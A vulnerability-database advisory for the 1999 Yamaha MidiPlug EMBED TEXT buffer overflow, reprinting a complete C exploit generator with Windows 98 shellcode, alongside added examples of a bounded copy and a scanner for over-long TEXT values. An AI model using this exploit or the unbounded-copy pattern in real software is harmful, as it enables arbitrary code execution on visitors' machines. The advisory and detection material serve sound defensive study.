Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability
Vulnerability ID | 1105587 | Vulnerability type | Buffer overflow |
Published | 1999-11-02 | Updated | 2005-05-02 |
CVE ID | CVE-1999-0946 |
CNNVD ID | CNNVD-199911-009 |
Platform | Windows | CVSS score | 5.1 |
|Vulnerability source
|Vulnerability details
A buffer overflow vulnerability exists in Yamaha MidiPlug. It is triggered by an over-long Text attribute value in an EMBED tag.
|Exploit
source: http://www.securityfocus.com/bid/760/info
There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page.
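The copy pattern that produces an overflow of this kind, shown as an added illustration and not MidiPlug's own code (the plug-in's source is not on this page): a hypothetical EMBED attribute handler that copies the TEXT value into a fixed stack buffer with no bound, beside a bounded version that rejects values that do not fit. TEXT_MAX, the function names and the constructed sample input are assumptions for the example; the real size of the plug-in's buffer is not given anywhere on this page.

```c
#include <stdio.h>
#include <string.h>

#define TEXT_MAX 256   /* assumed size of the plug-in's TEXT buffer (hypothetical) */

/* Vulnerable pattern: the attribute value is copied with no length check.
 * A TEXT value longer than TEXT_MAX runs past 'text' into whatever the
 * compiler placed above it on the stack, including the saved return
 * address; that is the kind of overwrite the exploit on this page performs. */
void set_text_unsafe(const char *attr_value)
{
    char text[TEXT_MAX];
    strcpy(text, attr_value);            /* unbounded copy */
    printf("text=%s\n", text);
}

/* Hardened version: measure first, reject a value that does not fit
 * (terminator included), and copy with an explicit length.
 * Returns 0 on success, -1 if the value was rejected. */
int set_text_safe(const char *attr_value, char *out, size_t out_len)
{
    size_t n = strlen(attr_value);
    if (out_len == 0 || n >= out_len)
        return -1;                       /* would overflow: refuse, do not silently truncate */
    memcpy(out, attr_value, n + 1);      /* n bytes plus the NUL */
    return 0;
}

/* Constructed input: a TEXT value of 'len' filler bytes (0x90, the byte the
 * exploit pads with), so the check can be exercised without a browser. */
void make_long_text(char *buf, size_t len)
{
    memset(buf, 0x90, len);
    buf[len] = '\0';
}

/* 1 if a TEXT value of 'len' bytes is accepted by the hardened copy, else 0. */
int long_text_accepted(size_t len)
{
    char value[1024];
    char dst[TEXT_MAX];
    if (len >= sizeof value) return 0;
    make_long_text(value, len);
    return set_text_safe(value, dst, sizeof dst) == 0;
}

int main(void)
{
    printf("700-byte TEXT (the exploit's MAXBUF) accepted: %d\n", long_text_accepted(700));
    printf("255-byte TEXT accepted: %d\n", long_text_accepted(255));
    /* set_text_unsafe() with the 700-byte value would smash this stack frame;
     * it is shown for the pattern and deliberately not called. */
    return 0;
}
```

The safe variant rejects rather than truncates: a silently shortened attribute value hides the fact that untrusted page content tried to exceed the buffer, which is the event a plug-in should log and refuse.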
/*=============================================================================
YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MAXBUF 700   /* length of the TEXT value written into the page */
#define RETADR 256   /* offset within the value at which the return address is overwritten */

/* Start/end pairs of the Windows 98 shared system DLL region that are searched
 * for a "jmp eax" (FF E0) instruction; the list is terminated by 0,0. On Win9x
 * this region is shared by every process, so the generator can read the same
 * bytes that the browser will have mapped. On later Windows versions these
 * reads fault, which is why the generator only works on the platform named
 * in the header. */
unsigned int mems[]={
    0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,0,0};

/* Position-independent payload. It uses a call/pop to locate the string that
 * cmdbuf appends after it, NUL-terminates the '.'-separated names in place,
 * loads MSVCRT.DLL and resolves system() through hard-coded Windows 98 API
 * addresses (assembled with an "add ah" so that no byte of the address is
 * 0x00), then calls system("WELCOME.EXE") and spins. The trailing 0x00
 * terminates the array as a string so that strcat() can append cmdbuf. */
unsigned char exploit_code[200]={
    0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
    0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
    0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
    0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
    0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
    0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
    0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
    0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
    0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
};

/* DLL name, function name and command, separated by '.' so that the payload
 * contains no 0x00 byte; the shellcode writes the NUL separators at run time. */
unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";

/* Scan [st,ed) for the two-byte sequence c1 c2 and return the first address
 * that contains no zero byte (a zero byte would terminate the TEXT string
 * early). Returns 0 if none is found. */
unsigned int search_mem(unsigned char *st,unsigned char *ed,
                        unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    unsigned int adr;
    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2){
            adr=(unsigned int)p;
            if ((adr&0xff)==0) continue;
            if (((adr>>8)&0xff)==0) continue;
            if (((adr>>16)&0xff)==0) continue;
            if (((adr>>24)&0xff)==0) continue;
            return(adr);
        }
    return(0);
}

int main(int argc,char *argv[])
{
    FILE *fp;
    unsigned int i,ip;
    unsigned char buf[MAXBUF+1];   /* MAXBUF payload bytes plus the terminator */
    if (argc<2){
        printf("usage %s output_htmlfile\n",argv[0]);
        exit(1);
    }
    if ((fp=fopen(argv[1],"wb"))==NULL) return 1;
    fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
    /* Find a "jmp eax" whose address has no zero byte. The exploit relies on
     * eax pointing at the start of the copied TEXT value when the overwritten
     * return address is used, so control lands on the payload at offset 0. */
    for (i=0;;i+=2){
        if (mems[i]==0){
            printf("Can not find jmp code.\n");
            exit(1);
        }
        if ((ip=search_mem((unsigned char *)mems[i],
                           (unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
    }
    printf("Jumping address : %x\n",ip);
    memset(buf,0x90,MAXBUF);                      /* NOP filler */
    buf[RETADR  ]=ip&0xff;                        /* little-endian return address at offset 256 */
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    strcat((char *)exploit_code,(char *)cmdbuf);  /* payload followed by the command string */
    memcpy(buf,exploit_code,strlen((char *)exploit_code)); /* placed at offset 0, well below RETADR */
    buf[MAXBUF]=0;
    fprintf(fp,"%s\"\n>\n</HTML>",buf);
    fclose(fp);
    printf("%s created.\n",argv[1]);
    return 0;
}
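A detection check for pages that carry this payload, added here as an example and not part of the advisory or of the exploit above: a length-bounded scanner that finds the first EMBED tag in an HTML buffer, walks its attributes, and measures the TEXT value, treating anything over an assumed limit (TEXT_LIMIT, an assumption) as suspicious. The sample document is constructed in the same shape as the generator writes, with 0x90 filler in place of the real payload. The scanner generalizes past that exact layout: it never relies on NUL termination (the payload contains high bytes and no NUL), reads a quoted value to its closing quote even when the value contains '>', and handles unquoted values as well.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define TEXT_LIMIT 256   /* assumed safe bound; the generator above writes 700 bytes */

/* Case-insensitive match of 'needle' at position p, never reading past end. */
static int match_ci(const char *p, const char *end, const char *needle)
{
    for (; *needle; needle++, p++)
        if (p >= end || tolower((unsigned char)*p) != tolower((unsigned char)*needle))
            return 0;
    return 1;
}

/* Length of the TEXT attribute value of the first <EMBED ...> tag in
 * html[0..len), or -1 if no EMBED tag carries a TEXT attribute. */
long embed_text_length(const char *html, size_t len)
{
    const char *end = html + len;
    const char *p = html;
    while (p + 6 <= end && !match_ci(p, end, "<embed")) p++;
    if (p + 6 > end) return -1;
    p += 6;
    while (p < end) {
        while (p < end && isspace((unsigned char)*p)) p++;
        if (p >= end || *p == '>') return -1;          /* tag closed without TEXT */
        const char *name = p;
        while (p < end && *p != '=' && *p != '>' && !isspace((unsigned char)*p)) p++;
        size_t name_len = (size_t)(p - name);
        size_t val_len = 0;
        while (p < end && isspace((unsigned char)*p)) p++;
        if (p < end && *p == '=') {
            p++;
            while (p < end && isspace((unsigned char)*p)) p++;
            if (p < end && (*p == '"' || *p == '\'')) {
                char q = *p++;
                const char *val = p;
                while (p < end && *p != q) p++;        /* '>' inside quotes does not end the tag */
                val_len = (size_t)(p - val);
                if (p < end) p++;                      /* skip the closing quote */
            } else {
                const char *val = p;
                while (p < end && *p != '>' && !isspace((unsigned char)*p)) p++;
                val_len = (size_t)(p - val);
            }
        }
        if (name_len == 4 && match_ci(name, end, "text"))
            return (long)val_len;
    }
    return -1;
}

/* 1 if the first EMBED TEXT value exceeds TEXT_LIMIT, else 0. */
int embed_text_overflows(const char *html, size_t len)
{
    return embed_text_length(html, len) > TEXT_LIMIT;
}

/* Constructed sample: the document shape the generator emits, with
 * 'text_len' filler bytes (0x90) standing in for its payload.
 * Returns the number of bytes written, or 0 if 'out' is too small. */
size_t build_sample(char *out, size_t out_len, size_t text_len)
{
    const char *head = "<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"";
    const char *tail = "\"\n>\n</HTML>";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + text_len + tl > out_len) return 0;
    memcpy(out, head, hl);
    memset(out + hl, 0x90, text_len);
    memcpy(out + hl + text_len, tail, tl);
    return hl + text_len + tl;
}

int main(void)
{
    char doc[1024];
    size_t n = build_sample(doc, sizeof doc, 700);
    printf("TEXT length %ld, flagged=%d\n", embed_text_length(doc, n), embed_text_overflows(doc, n));
    return 0;
}
```

A real filter would apply the same walk to every EMBED tag in the document rather than the first, and would also treat a TEXT value made mostly of 0x90 or other non-printable bytes as suspicious regardless of length; the length check alone is enough to catch the generator's output, which is always 700 bytes.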
|References
Source: BID
Name: 760
Link: http://www.securityfocus.com/bid/760
Source: BUGTRAQ
Name: 19991102 Some holes for Win/UNIX softwares
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=94157187815629&w=2